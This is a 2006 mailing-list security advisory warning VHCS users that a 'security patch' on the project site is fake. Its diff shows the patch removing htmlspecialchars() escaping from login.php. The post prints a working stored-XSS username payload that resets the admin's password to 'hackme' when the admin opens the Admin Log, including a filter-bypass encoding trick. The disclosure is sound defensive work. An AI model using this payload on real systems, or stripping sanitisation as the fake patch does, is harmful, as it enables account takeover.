[<prev] [next>] [day] [month] [year] [list]
Message-ID: <43E65B67.8000707@rs-labs.com>
Date: Sun Feb 5 20:09:32 2006
From: roman at rs-labs.com (Roman Medina-Heigl Hernandez)
Subject: VHCS Security Patch - 2006-02-05 --> Fake!
Hi,
I've just visited VHCS main page and noticed the following "security patch":
http://vhcs.net/new/modules/news/article.php?storyid=23
It reads:
"This patch is for all VHCS versions.
You have to update only one GUI file - /vhcs2/gui/include/login.php
Just replace the file
"
Well, just do NOT apply it!!!! It's a fake! Indeed it will leave your
VHCS installation vulnerable to a high severity cross-site-scripting issue!
See it:
login_orig_unix.php --> original 2.4.7.1 login.php (converted to Unix)
login_new_unix.php --> login.php from "security patch"
roman@...labs:~$ diff login_orig_unix.php login_new_unix.php
38c38
< write_log("Login error, <b><i>".htmlspecialchars($uname,
ENT_QUOTES, "UTF-8")."</i></b> unknown username");
---
> write_log("Login error, <b><i>".$uname."</i></b> unknown
username");
75c75
<
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
is not OK - user can not login");
---
>
write_log( $uname." Domain status is not OK - user can not login");
104c104
< write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user logged in.");
---
> write_log( $uname." user logged in.");
112c112
< write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad password login data.");
---
> write_log( $uname." bad password login data.");
190c190
< write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user session timed out");
---
> write_log($uname." user session timed out");
199c199
< write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad session data.");
---
> write_log($uname." bad session data.");
258a259
> die();
261a263
> }
437c439
< }
---
> //}
roman@...labs:~$
As you can see, the "patch" removes htmlspecialchars() calls letting
login.php vulnerable . Nasty...
If you apply the "patch" (or have an old VHCS install, for instance
version <= 2.4.6.2), the XSS bug is active. Just for fun, you can
exploit it by entering the following as "username" (in the login entry
page):
</form><form name="dsr" method="post" action="ch%61nge_password.php"><input
name="pass" value="hackme"><input name="pass_rep" value="hackme"><input
name="uaction"
value="updt_pass"></form><script>document.dsr.submit()</script>
When the VHCS admin enters the "Admin Log" page (in VHCS menu)... his
password will be set up to "hackme" :-) The %61 trick is necessary to
bypass some string substitution. This exploit combines the XSS bug with
what I see as a poor security design bug, which is letting change
password without supplying the old one (Alex, please, fix it in next
release!).
Summarizing, my recommendation: use VHCS 2.4.7.1, don't apply patch.
--
Cheers,
-Roman
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Powered by blists - more mailing lists